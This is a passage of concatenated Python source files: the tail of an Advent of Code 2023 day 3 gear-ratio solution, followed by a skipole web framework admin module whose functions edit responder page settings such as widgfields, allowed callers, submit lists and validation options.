            for i, digit in enumerate(number_list[::-1]):
                number += digit * 10**i
            numbers.append(number)
    return numbers
def is_adjacent_to_gear(grid, number_start, gear):
    """Return True if the number at *number_start* touches the *gear* cell
    (including diagonally)."""
    number_len = len(find_number_starting_at(grid, number_start))
    start_row = max(number_start[0]-1, 0)
    end_row = min(number_start[0]+2, grid.shape[0]+1)
    start_col = max(number_start[1]-1, 0)
    # exclusive bound col+len+1 covers the right neighbour column col+len
    end_col = min(number_start[1]+number_len+1, grid.shape[1]+1)
    sub_grid = grid[start_row:end_row, start_col:end_col]
    # print(sub_grid)
    # translate window coordinates back to grid coordinates and compare
    for i in range(sub_grid.shape[0]):
        for j in range(sub_grid.shape[1]):
            if (i+start_row, j+start_col) == gear:
                return True
    return False
def get_numbers_adjacent_to_gear(grid, number_starts, gear):
    """Return the numbers from *number_starts* that are adjacent to *gear*."""
    numbers = []
    # [print(has_surrounding_symbol(grid, number_start), '\n') for number_start in number_starts]
    for number_start in number_starts:
        if is_adjacent_to_gear(grid, number_start, gear):
            number_list = find_number_starting_at(grid, number_start)
            # reassemble the digit list into an integer
            number = 0
            for i, digit in enumerate(number_list[::-1]):
                number += digit * 10**i
            numbers.append(number)
    return numbers
def get_gears(grid):
    """Return every '*' cell that has exactly two adjacent numbers (a 'gear')."""
    return [candidate for candidate in find_gear_candidates(grid) if has_two_surrounding_numbers(grid, candidate)]
if __name__ == '__main__':
    input_grid = parse_grid(INPUT)
    gears = get_gears(input_grid)
    number_starts = find_number_starts(input_grid)
    # for each gear, the (two) numbers adjacent to it
    numbers_adjacent_to_gears = [get_numbers_adjacent_to_gear(input_grid, number_starts, gear) for gear in gears]
    # --- part 1 ---
    print(sum(get_numbers_with_surrounding_symbols(input_grid)))
    # --- part 2 ---
    print(sum([pair[0]*pair[1] for pair in numbers_adjacent_to_gears]))
| iptch/2023-advent-of-code | DHE/day3.py | day3.py | py | 4,759 | python | en | code | 2 | github-code | 90 |
22074328125 |
"Functions implementing respond page editing"
import collections
from .... import editresponder, utils
from skipole import ValidateError, FailPage, ServerError, GoTo, SectionData
from .. import adminutils
def _ident_to_str(ident):
"Returns string ident or label"
if ident is None:
return ''
if isinstance(ident, str):
return ident
# ident must be a list or tuple of (project,number)
if len(ident) != 2:
raise FailPage("Invalid ident")
return ident[0] + "," + str(ident[1])
def _field_to_string(wfield):
"Returns two forms of a widgfield, or if a string, then just the string twice"
if isinstance(wfield, str):
return wfield, wfield
# a widgfield has four elements, reduce it to the non empty elements
shortwfield = [ w for w in wfield if w ]
if len(shortwfield) == 1:
return shortwfield[0], shortwfield[0]
wf1 = ",".join(shortwfield)
if len(shortwfield) == 2:
wf2 = shortwfield[0] + ":" + shortwfield[1]
else:
wf2 = shortwfield[0] + "-" + shortwfield[1] + ":" + shortwfield[2]
return wf1, wf2
def _t_ref(r_info, item):
"Returns a TextBlock ref for the given item"
return ".".join(["responders", r_info.module_name, r_info.responder, item])
def fail_page_help(skicall):
    """Retrieves help text for the fail page ident and shows it in the
    adminhead section of the page being built."""
    text = skicall.textblock("responders.fail_page")
    if not text:
        text = "No help text for responders.fail_page has been found"
    pd = skicall.call_data['pagedata']
    # Fill in header
    sd_adminhead = SectionData("adminhead")
    sd_adminhead["show_help","para_text"] = "\n" + text
    sd_adminhead["show_help","hide"] = False
    pd.update(sd_adminhead)
def submit_data_help(skicall):
    """Retrieves help text for the submit_data function of this responder
    type and shows it in the adminhead section."""
    call_data = skicall.call_data
    if 'page_number' in call_data:
        pagenumber = call_data['page_number']
    else:
        raise FailPage(message = "page missing")
    try:
        project = call_data['editedprojname']
        # get a ResponderInfo named tuple with information about the responder
        r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
    except ServerError as e:
        raise FailPage(message=e.message)
    # responder-specific TextBlock reference for the submit_data help
    sdtextref = _t_ref(r_info, 'submit_data')
    text = skicall.textblock(sdtextref)
    if not text:
        text = "No help text for %s has been found" % sdtextref
    pd = call_data['pagedata']
    # Fill in header
    sd_adminhead = SectionData("adminhead")
    sd_adminhead["show_help","para_text"] = "\n" + text
    sd_adminhead["show_help","hide"] = False
    pd.update(sd_adminhead)
def submit_dict_help(skicall):
    """Retrieves help text for the responder submit_dict and shows it in the
    adminhead section."""
    call_data = skicall.call_data
    if 'page_number' in call_data:
        pagenumber = call_data['page_number']
    else:
        raise FailPage(message = "page missing")
    try:
        project = call_data['editedprojname']
        # get a ResponderInfo named tuple with information about the responder
        r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
    except ServerError as e:
        raise FailPage(message=e.message)
    # responder-specific TextBlock reference for the submit_dict help
    sdtextref = _t_ref(r_info, 'submit_dict')
    text = skicall.textblock(sdtextref)
    if not text:
        text = "No help text for %s has been found" % sdtextref
    pd = call_data['pagedata']
    # Fill in header
    sd_adminhead = SectionData("adminhead")
    sd_adminhead["show_help","para_text"] = "\n" + text
    sd_adminhead["show_help","hide"] = False
    pd.update(sd_adminhead)
def call_data_help(skicall):
    """Retrieves help text for the responder call_data and shows it in the
    adminhead section."""
    call_data = skicall.call_data
    if 'page_number' in call_data:
        pagenumber = call_data['page_number']
    else:
        raise FailPage(message = "page missing")
    try:
        project = call_data['editedprojname']
        # get a ResponderInfo named tuple with information about the responder
        r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
    except ServerError as e:
        raise FailPage(message=e.message)
    # responder-specific TextBlock reference for the call_data help
    cdtextref = _t_ref(r_info, 'call_data')
    text = skicall.textblock(cdtextref)
    if not text:
        text = "No help text for %s has been found" % cdtextref
    pd = call_data['pagedata']
    # Fill in header
    sd_adminhead = SectionData("adminhead")
    sd_adminhead["show_help","para_text"] = "\n" + text
    sd_adminhead["show_help","hide"] = False
    pd.update(sd_adminhead)
def retrieve_edit_respondpage(skicall):
    """Retrieves widget data for the edit respond page.

    Fills the page header and the generic page-edit section, then - depending
    on which features this responder class declares (widgfield, alternate and
    target idents, allowed callers, validate/submit options, field options) -
    populates the matching input sections of the admin page.
    """
    call_data = skicall.call_data
    pd = call_data['pagedata']
    # clears any session data, keeping page_number, pchange and any status message
    adminutils.clear_call_data(call_data, keep=["page_number", "pchange", "status"])
    if 'page_number' in call_data:
        pagenumber = call_data['page_number']
        str_pagenumber = str(pagenumber)
    else:
        raise FailPage(message = "page missing")
    try:
        project = call_data['editedprojname']
        pageinfo = utils.page_info(project, pagenumber)
        if pageinfo.item_type != 'RespondPage':
            raise FailPage(message = "Invalid page")
        call_data['pchange'] = pageinfo.change
        # Fill in header
        sd_adminhead = SectionData("adminhead")
        sd_adminhead["page_head","large_text"] = pageinfo.name
        sd_adminhead["map","show"] = True
        pd.update(sd_adminhead)
        # fills in the data for editing page name, brief, parent, etc.,
        sd_page_edit = SectionData("page_edit")
        sd_page_edit['p_ident','span_text'] = f"{project},{str_pagenumber}"
        sd_page_edit['p_name','page_ident'] = (project,str_pagenumber)
        sd_page_edit['p_description','page_ident'] = (project,str_pagenumber)
        sd_page_edit['p_rename','input_text'] = pageinfo.name
        sd_page_edit['p_parent','input_text'] = "%s,%s" % (project, pageinfo.parentfolder_number)
        sd_page_edit['p_brief','input_text'] = pageinfo.brief
        pd.update(sd_page_edit)
        # get a ResponderInfo named tuple with information about the responder
        r_info = editresponder.responder_info(project, pagenumber, call_data['pchange'])
    except ServerError as e:
        raise FailPage(message=e.message)
    pd['respondertype','para_text'] = "This page is a responder of type: %s." % (r_info.responder,)
    pd['responderdescription','textblock_ref'] = ".".join(["responders",r_info.module_name, r_info.responder])
    # widgfield - split a stored "section,widget,field" string into the form inputs
    if r_info.widgfield_required:
        sd_setwidgfield = SectionData("setwidgfield")
        sd_setwidgfield['widgfieldform', 'action'] = "responder_widgfield"
        sd_setwidgfield.show = True
        if r_info.widgfield:
            pd['widgfield','input_text'] = r_info.widgfield
            widg = r_info.widgfield.split(',')
            if len(widg) == 3:
                sd_setwidgfield['respondersection','input_text'] = widg[0]
                sd_setwidgfield['responderwidget','input_text'] = widg[1]
                sd_setwidgfield['responderfield','input_text'] = widg[2]
            elif len(widg) == 2:
                sd_setwidgfield['respondersection','input_text'] = ''
                sd_setwidgfield['responderwidget','input_text'] = widg[0]
                sd_setwidgfield['responderfield','input_text'] = widg[1]
            else:
                sd_setwidgfield['respondersection','input_text'] = ''
                sd_setwidgfield['responderwidget','input_text'] = ''
                sd_setwidgfield['responderfield','input_text'] = ''
        else:
            sd_setwidgfield['respondersection','input_text'] = ''
            sd_setwidgfield['responderwidget','input_text'] = ''
            sd_setwidgfield['responderfield','input_text'] = ''
        pd.update(sd_setwidgfield)
    else:
        pd['widgfield','show'] = False
    # alternate ident
    if r_info.alternate_ident_required:
        sd_alternate = adminutils.formtextinput( "alternate_ident",     # section alias
                                                 _t_ref(r_info, 'alternate_ident'),    # textblock
                                                 "Set an alternate ident:",            # field label
                                                 _ident_to_str(r_info.alternate_ident),   # input text
                                                 action = "alternate_ident",
                                                 action_json = "alternate_ident_json",
                                                 left_label = "Submit the ident : ")
        pd.update(sd_alternate)
    # target ident
    if r_info.target_ident_required:
        sd_target = adminutils.formtextinput("target_ident",        # section alias
                                             _t_ref(r_info, 'target_ident'),     # textblock
                                             "Set the target ident:",            # field label
                                             _ident_to_str(r_info.target_ident),    # input text
                                             action = "set_target_ident",
                                             action_json = "set_target_ident_json",
                                             left_label = "Submit the ident : ")
        pd.update(sd_target)
    # allowed callers
    if r_info.allowed_callers_required:
        pd['allowed_callers_description','textblock_ref'] = _t_ref(r_info, 'allowed_callers_list')
        if r_info.allowed_callers:
            contents = []
            for ident in r_info.allowed_callers:
                ident_row = [_ident_to_str(ident), _ident_to_str(ident).replace(",","_")]
                contents.append(ident_row)
            pd['allowed_callers_list','contents'] = contents
        else:
            pd['allowed_callers_list','show'] = False
        sd_allowed_caller = adminutils.formtextinput("allowed_caller",            # section alias
                                                     _t_ref(r_info, 'allowed_callers'),        # textblock
                                                     "Add an allowed caller ident or label:",  # field label
                                                     "",                                       # input text
                                                     action = "add_allowed_caller",
                                                     left_label = "Add the allowed caller : ")
        pd.update(sd_allowed_caller)
    else:
        pd['allowed_callers_description','show'] = False
        pd['allowed_callers_list','show'] = False
    # validate option
    if r_info.validate_option_available:
        pd['val_option_desc', 'textblock_ref'] = _t_ref(r_info, 'validate_option')
        if r_info.validate_option:
            pd['set_val_option','button_text'] = "Disable Validation"
            pd['val_status','para_text'] = "Validate received field values : Enabled"
            pd['validate_fail', 'input_text'] = _ident_to_str(r_info.validate_fail_ident)
            pd['validate_fail', 'hide'] = False
        else:
            pd['set_val_option','button_text'] = "Enable Validation"
            pd['val_status','para_text'] = "Validate received field values : Disabled"
            pd['validate_fail', 'hide'] = True
    else:
        pd['val_option_desc','show'] = False
        pd['set_val_option','show'] = False
        pd['val_status','show'] = False
        pd['validate_fail', 'show'] = False
    # submit option
    if r_info.submit_option_available:
        pd['submit_option_desc','textblock_ref'] = _t_ref(r_info, 'submit_option')
        if r_info.submit_option:
            pd['set_submit_option','button_text'] = 'Disable submit_data'
            pd['submit_status','para_text'] = "Call submit_data : Enabled"
        else:
            pd['set_submit_option','button_text'] = 'Enable submit_data'
            pd['submit_status','para_text'] = "Call submit_data : Disabled"
    else:
        pd['submit_option_desc','show'] = False
        pd['set_submit_option','show'] = False
        pd['submit_status','show'] = False
    # submit list and fail page, shown when submit_data will be called
    if r_info.submit_required or r_info.submit_option:
        pd['submit_list_description','textblock_ref'] = 'responders.about_submit_list'
        if r_info.submit_list:
            contents = []
            for index, s in enumerate(r_info.submit_list):
                s_row = [s, str(index), str(index), str(index)]
                contents.append(s_row)
            pd['submit_list','contents'] = contents
        else:
            pd['submit_list','hide'] = True
        pd['submit_string','input_text'] = ''
        # fail page
        sd_failpage = adminutils.formtextinput( "failpage",      # section alias
                                                'responders.shortfailpage',       # textblock
                                                "Fail page ident or label:",      # field label
                                                _ident_to_str(r_info.fail_ident),    # input text
                                                action = "set_fail_ident",
                                                left_label = "Set the fail page : ")
        pd.update(sd_failpage)
    else:
        pd['submit_list_description','show'] = False
        pd['submit_list','show'] = False
        pd['submit_string','show'] = False
        pd['submit_info','show'] = False
    # final paragraph
    pd['final_paragraph','textblock_ref'] = _t_ref(r_info, 'final_paragraph')
    # field sections have show = False by default, so the appropriate section
    # to be shown is set here with show = True
    # field options
    f_options = r_info.field_options
    if not f_options['fields']:
        # no fields so no further data to input
        return
    # the fields option is enabled
    if f_options['single_field']:
        if f_options['field_values']:
            # single field and value
            if r_info.single_field_value:
                fieldname, fieldvalue = r_info.single_field_value
            else:
                fieldname = ''
                fieldvalue = ''
            sd_singlefieldvalue = adminutils.addsinglefieldval('addfieldval',
                                                               _t_ref(r_info, 'fields'),    # textblock
                                                               skicall.textblock(_t_ref(r_info, 'addfieldlabel')),
                                                               skicall.textblock(_t_ref(r_info, 'addvaluelabel')),
                                                               fieldname,
                                                               fieldvalue,
                                                               action='add_field_value',
                                                               left_label='add :')
            pd.update(sd_singlefieldvalue)
        else:
            # single field, no value
            if r_info.single_field:
                fieldname = r_info.single_field
            else:
                fieldname = ''
            sd_singlefield = adminutils.formtextinput( "singlefield",      # section alias
                                                       _t_ref(r_info, 'fields'),    # textblock
                                                       "Set the field name:",       # field label
                                                       fieldname,                   # input text
                                                       action = "set_field",
                                                       left_label = "Submit the field : ")
            pd.update(sd_singlefield)
        return
    # to get here single_field is not enabled
    if f_options['field_values']:
        pd['field_values_list','show'] = True
        # populate field_values_list
        contents = []
        field_vals = r_info.field_values_list
        for field, value in field_vals:
            f1,f2 = _field_to_string(field)
            v1,v2 = _field_to_string(value)
            if not v1:
                v1 = "' '"
            row = [f1, v1, f2]
            contents.append(row)
        if contents:
            contents.sort()
            pd['field_values_list','contents'] = contents
        else:
            pd['field_values_list','show'] = False
        # populate the widgfieldval section
        if f_options['widgfields']:
            if f_options['field_keys']:
                sd_widgfieldval = adminutils.widgfieldval('widgfieldval',
                                                          _t_ref(r_info, 'fields'),
                                                          "key to be used in call_data:",
                                                          action='add_widgfield_value',
                                                          left_label='Add the key :')
            else:
                sd_widgfieldval = adminutils.widgfieldval('widgfieldval',
                                                          _t_ref(r_info, 'fields'),
                                                          "Widget/field value:",
                                                          action='add_widgfield_value',
                                                          left_label='submit value :')
            pd.update(sd_widgfieldval)
        else:
            ### f_options['field_values'] is True, but not f_options['widgfields']
            sd_addfieldval = adminutils.addfieldval('addfieldval',
                                                    _t_ref(r_info, 'fields'),    # textblock
                                                    skicall.textblock(_t_ref(r_info, 'addfieldlabel')),
                                                    skicall.textblock(_t_ref(r_info, 'addvaluelabel')),
                                                    action='add_field_value',
                                                    left_label='add :')
            pd.update(sd_addfieldval)
    else:
        # so now add fields, without values
        pd['field_list','show'] = True
        # populate field_list
        contents = []
        field_vals = r_info.field_list
        for field in field_vals:
            f1,f2 = _field_to_string(field)
            row = [f1, f2]
            contents.append(row)
        if contents:
            contents.sort()
            pd['field_list','contents'] = contents
        else:
            pd['field_list','show'] = False
        # populate add_field
        if f_options['widgfields']:
            sd_addwidgfield = adminutils.widgfield('addwidgfield',
                                                   _t_ref(r_info, 'fields'),
                                                   action='add_widgfield',
                                                   left_label='Add the widget :')
            pd.update(sd_addwidgfield)
        else:
            # this never called as there is no responder yet with the combination of
            # both f_options['field_values']==False and f_options['widgfields']==False
            pass
def submit_widgfield(skicall):
    """Sets the responder widgfield from the submitted section/widget/field
    inputs; widget and field are required, section is optional."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if ('setwidgfield','responderwidget','input_text') not in call_data:
        raise FailPage(message="No widget name given")
    if not call_data['setwidgfield','responderwidget','input_text']:
        raise FailPage(message="No widget name given")
    widgfield = call_data['setwidgfield','responderwidget','input_text']
    if ('setwidgfield','responderfield','input_text') not in call_data:
        raise FailPage(message="No widget field given")
    if not call_data['setwidgfield','responderfield','input_text']:
        raise FailPage(message="No widget field given")
    # assemble "widget,field", optionally prefixed by "section,"
    widgfield = widgfield + "," + call_data['setwidgfield','responderfield','input_text']
    if ('setwidgfield','respondersection','input_text') in call_data:
        if call_data['setwidgfield','respondersection','input_text']:
            widgfield = call_data['setwidgfield','respondersection','input_text'] + ',' + widgfield
    try:
        call_data['pchange'] = editresponder.set_widgfield(project, pagenumber, pchange, widgfield)
    except ServerError as e:
        raise FailPage(e.message)
    call_data['status'] = 'WidgField set'
def submit_alternate_ident(skicall):
    """Sets the alternate page ident of the responder from the submitted value."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if not 'alternate_ident' in call_data:
        raise FailPage(message="No alternate page label given")
    if not call_data['alternate_ident']:
        raise FailPage(message="No alternate page label given")
    # Set the page alternate_ident
    try:
        call_data['pchange'] = editresponder.set_alternate_ident(project, pagenumber, pchange, call_data['alternate_ident'])
    except ServerError as e:
        raise FailPage(e.message)
    # mark the form input as accepted
    sd_alternate = SectionData("alternate_ident")
    sd_alternate['textinput', 'set_input_accepted'] = True
    pd.update(sd_alternate)
    call_data['status'] = 'Page set'
def submit_target_ident(skicall):
    """Set the responder's target ident from the submitted value."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # missing key and empty value are both rejected
    if not call_data.get('target_ident'):
        raise FailPage(message="No target ident given")
    try:
        call_data['pchange'] = editresponder.set_target_ident(project, pagenumber, pchange, call_data['target_ident'])
    except ServerError as e:
        raise FailPage(e.message)
    # flag the text input as accepted on the returned page
    sd_target = SectionData("target_ident")
    sd_target['textinput', 'set_input_accepted'] = True
    pd.update(sd_target)
    call_data['status'] = 'Target Ident set'
def submit_validate_fail_ident(skicall):
    """Set the ident of the page called when received data fails validation."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # note: only a missing key is rejected, an empty value is accepted
    if 'validate_fail_ident' not in call_data:
        raise FailPage(message="No validate fail ident given", widget="validate_fail")
    try:
        call_data['pchange'] = editresponder.set_validate_fail_ident(project, pagenumber, pchange, call_data['validate_fail_ident'])
    except ServerError as e:
        raise FailPage(e.message)
    # flag the input as accepted
    pd['validate_fail','set_input_accepted'] = True
    call_data['status'] = 'Validate Fail Ident set'
def submit_fail_ident(skicall):
    """Set the responder's fail page ident."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # note: only a missing key is rejected, an empty value is accepted
    if 'fail_ident' not in call_data:
        raise FailPage(message="No fail ident given")
    try:
        call_data['pchange'] = editresponder.set_fail_ident(project, pagenumber, pchange, call_data['fail_ident'])
    except ServerError as e:
        raise FailPage(e.message)
    call_data['status'] = 'Fail Ident set'
def add_allowed_caller(skicall):
    """Add a page to the responder's list of allowed callers."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # missing key and empty value are both rejected
    if not call_data.get('allowed_caller'):
        raise FailPage(message="No allowed caller given")
    try:
        call_data['pchange'] = editresponder.add_allowed_caller(project, pagenumber, pchange, call_data['allowed_caller'])
    except ServerError as e:
        raise FailPage(e.message)
def delete_allowed_caller(skicall):
    """Remove a page from the responder's list of allowed callers."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # only a missing key is rejected here
    if 'delete_allowed_caller' not in call_data:
        raise FailPage(message="No allowed caller given")
    try:
        call_data['pchange'] = editresponder.delete_allowed_caller(project, pagenumber, pchange, call_data['delete_allowed_caller'])
    except ServerError as e:
        raise FailPage(e.message)
def remove_field(skicall):
    """Delete a field from the responder."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # only a missing key is rejected here
    if 'remove_field' not in call_data:
        raise FailPage(message="No field to remove given")
    try:
        call_data['pchange'] = editresponder.remove_field(project, pagenumber, pchange, call_data['remove_field'])
    except ServerError as e:
        raise FailPage(e.message)
def add_widgfield_value(skicall):
    """Adds a widgfield and value pair to the responder.

    The widgfield string is built from the submitted (optional) section,
    widget and field names.  An empty value is only accepted if the
    responder's field options allow empty values."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    try:
        s = call_data['widgfieldval','respondersection','input_text']
        w = call_data['widgfieldval','responderwidget','input_text']
        f = call_data['widgfieldval','responderfield','input_text']
        v = call_data['widgfieldval','responderval','input_text']
    except:
        raise FailPage(message="Invalid data given")
    if (not w) or (not f):
        raise FailPage(message="A widget and field is required")
    # build the comma separated widgfield, prefixed by the section if given
    if s:
        field = s + ',' + w + ',' + f
    else:
        field = w + ',' + f
    # if value is empty ensure empty values allowed
    if not v:
        # get a ResponderInfo named tuple with information about the responder
        try:
            r_info = editresponder.responder_info(project, pagenumber, pchange)
        except ServerError as e:
            raise FailPage(message=e.message)
        # field options
        f_options = r_info.field_options
        if not f_options['fields']:
            raise FailPage(message="Invalid submission, this responder does not have fields")
        if not f_options['empty_values_allowed']:
            # re-populate the form inputs so the user need not re-enter them
            sd_widgfieldval = SectionData('widgfieldval')
            sd_widgfieldval['respondersection','input_text'] = s
            sd_widgfieldval['responderwidget','input_text'] = w
            sd_widgfieldval['responderfield','input_text'] = f
            pd.update(sd_widgfieldval)
            raise FailPage(message="Invalid submission, empty field values are not allowed")
    # Add the field and value
    try:
        call_data['pchange'] = editresponder.add_field_value(project, pagenumber, pchange, field, v)
    except ServerError as e:
        raise FailPage(e.message)
def add_field_val(skicall):
    """Adds a field and value pair to the responder.

    An empty value is only accepted if the responder's field options allow
    it.  For single-field responders a status acknowledgement is set."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    try:
        f = call_data['addfieldval','responderfield','input_text']
        v = call_data['addfieldval','respondervalue','input_text']
    except:
        raise FailPage(message="Invalid data given")
    if not f:
        raise FailPage(message="Invalid data given")
    # get a ResponderInfo named tuple with information about the responder
    try:
        r_info = editresponder.responder_info(project, pagenumber, pchange)
    except ServerError as e:
        raise FailPage(message=e.message)
    # if value is empty ensure empty values allowed
    if not v:
        # field options
        f_options = r_info.field_options
        if not f_options['fields']:
            raise FailPage(message="Invalid submission, this responder does not have fields")
        if not f_options['empty_values_allowed']:
            # re-populate the field input so the user need not re-enter it
            sd_addfieldval = SectionData('addfieldval')
            sd_addfieldval['responderfield','input_text'] = f
            pd.update(sd_addfieldval)
            raise FailPage(message="Invalid submission, empty fields are not allowed")
    # Add the field and value
    try:
        call_data['pchange'] = editresponder.add_field_value(project, pagenumber, pchange, f, v)
    except ServerError as e:
        raise FailPage(e.message)
    if r_info.field_options['single_field']:
        # only a single field/value is being input, not a list, so present an acknowledgement
        call_data['status'] = 'Field has been set'
def add_widgfield(skicall):
    """Adds a widgfield, built from the submitted (optional) section,
    widget and field names, to the responder."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    try:
        s = call_data['addwidgfield','respondersection','input_text']
        w = call_data['addwidgfield','responderwidget','input_text']
        f = call_data['addwidgfield','responderfield','input_text']
    except KeyError:
        # a missing input indicates an invalid submission
        raise FailPage(message="Invalid data given")
    if (not w) or (not f):
        raise FailPage(message="A widget and field is required")
    # build the comma separated widgfield, prefixed by the section if given
    if s:
        field = s + ',' + w + ',' + f
    else:
        field = w + ',' + f
    # Add the field
    try:
        call_data['pchange'] = editresponder.add_field(project, pagenumber, pchange, field)
    except ServerError as e:
        raise FailPage(e.message)
def set_single_field(skicall):
    """Set the field in a responder which takes a single field only."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    # missing key and empty value are both rejected
    field = call_data.get(('singlefield', 'textinput', 'input_text'))
    if not field:
        raise FailPage(message="No field given")
    # store the field in the responder
    try:
        call_data['pchange'] = editresponder.set_single_field(project, pagenumber, pchange, field)
    except ServerError as e:
        raise FailPage(e.message)
    call_data['status'] = 'Fields set'
def delete_submit_list_string(skicall):
    """Deletes an indexed string from the responder's submit_list and
    rebuilds the displayed table (returned to the page via JSON)."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if not ('submit_list','contents') in call_data:
        raise FailPage(message="No submit_list string given")
    try:
        idx = int(call_data['submit_list','contents'])
    except:
        raise FailPage(message="Invalid value received")
    # NOTE(review): an out-of-range idx raises IndexError here (not caught
    # by the ServerError handler) -- confirm callers constrain idx
    try:
        # get the submit list
        submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
        del submit_list[idx]
        call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
    except ServerError as e:
        raise FailPage(e.message)
    # re-create the submit list table, these contents will be sent by JSON back to the page
    pd = call_data['pagedata']
    contents = []
    if submit_list:
        for index, s in enumerate(submit_list):
            # each row: the string plus its index repeated for the action buttons
            s_row = [s, str(index), str(index), str(index)]
            contents.append(s_row)
    else:
        # nothing left to display, hide the table
        pd['submit_list','hide'] = True
    pd['submit_list','contents'] = contents
def move_up_submit_list(skicall):
    """Moves an item one place up (towards index 0) in the submit_list and
    rebuilds the displayed table (returned to the page via JSON)."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if not ('submit_list','contents') in call_data:
        raise FailPage(message="No submit_list string given")
    try:
        idx = int(call_data['submit_list','contents'])
    except:
        raise FailPage(message="Invalid value received")
    if not idx:
        # cannot move item at position zero to pos -1
        raise FailPage(message="Cannot move the string up")
    try:
        # get the submit list
        submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
        # pop the item and re-insert it one position earlier
        item = submit_list.pop(idx)
        submit_list.insert(idx-1, item)
        call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
    except ServerError as e:
        raise FailPage(e.message)
    # re-create the submit list table, these contents will be sent by JSON back to the page
    pd = call_data['pagedata']
    contents = []
    for index, s in enumerate(submit_list):
        s_row = [s, str(index), str(index), str(index)]
        contents.append(s_row)
    pd['submit_list','contents'] = contents
def move_down_submit_list(skicall):
    """Moves an item one place down the submit_list and rebuilds the
    displayed table (returned to the page via JSON)."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if not ('submit_list','contents') in call_data:
        raise FailPage(message="No submit_list string given")
    try:
        idx = int(call_data['submit_list','contents'])
    except:
        raise FailPage(message="Invalid value received")
    try:
        # get the submit list
        submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
        if idx >= len(submit_list)-1:
            # cannot move last item further down
            # (FailPage is not a ServerError, so it propagates out of this try)
            raise FailPage(message="Cannot move the string down")
        # pop the item and re-insert it one position later
        item = submit_list.pop(idx)
        submit_list.insert(idx+1, item)
        call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
    except ServerError as e:
        raise FailPage(e.message)
    # re-create the submit list table, these contents will be sent by JSON back to the page
    pd = call_data['pagedata']
    contents = []
    for index, s in enumerate(submit_list):
        s_row = [s, str(index), str(index), str(index)]
        contents.append(s_row)
    pd['submit_list','contents'] = contents
def add_submit_list_string(skicall):
    """Appends a new string to the submit_list and rebuilds the displayed
    table (returned to the page via JSON).  Note: an empty string is
    accepted, only a missing key is rejected."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    if not ('submit_string','input_text') in call_data:
        raise FailPage(message="No submit_list string given")
    try:
        # get the submit list
        submit_list = editresponder.get_submit_list(project, pagenumber, pchange)
        submit_list.append(call_data['submit_string','input_text'])
        call_data['pchange'] = editresponder.set_submit_list(project, pagenumber, pchange, submit_list)
    except ServerError as e:
        raise FailPage(e.message)
    # re-create the submit list table, these contents will be sent by JSON back to the page
    pd = call_data['pagedata']
    contents = []
    for index, s in enumerate(submit_list):
        s_row = [s, str(index), str(index), str(index)]
        contents.append(s_row)
    pd['submit_list','contents'] = contents
    # ensure the table is visible (it is hidden when the list is empty)
    pd['submit_list','hide'] = False
def set_validate_option(skicall):
    """Toggle the responder's validate option and update the button text,
    status paragraph and validate_fail section visibility to match."""
    call_data = skicall.call_data
    pd = call_data['pagedata']
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    try:
        call_data['pchange'], validate_option = editresponder.toggle_validate_option(project, pagenumber, pchange)
    except ServerError as e:
        raise FailPage(e.message)
    if validate_option:
        button_text = "Disable Validation"
        status_text = "Validate received field values : Enabled"
        hide_fail = False
    else:
        button_text = "Enable Validation"
        status_text = "Validate received field values : Disabled"
        hide_fail = True
    pd['set_val_option','button_text'] = button_text
    pd['val_status','para_text'] = status_text
    pd['validate_fail', 'hide'] = hide_fail
    call_data['status'] = 'Validator changed'
def set_submit_option(skicall):
    """Toggle the responder's submit option."""
    call_data = skicall.call_data
    project = call_data['editedprojname']
    pagenumber = call_data['page_number']
    pchange = call_data['pchange']
    try:
        result = editresponder.toggle_submit_option(project, pagenumber, pchange)
    except ServerError as e:
        raise FailPage(e.message)
    # toggle_submit_option returns (pchange, new_option_state); only the
    # pchange needs to be stored here
    call_data['pchange'] = result[0]
    call_data['status'] = 'Submit option changed'
def map(skicall):
    """Creates the responder map page: an SVG diagram of this responder,
    the responders that target it or use it as a fail page, its allowed
    callers, its target/fail/validate/alternate pages and any responder
    specific details.

    (Note: the name shadows the builtin 'map' but is kept, since skiadmin
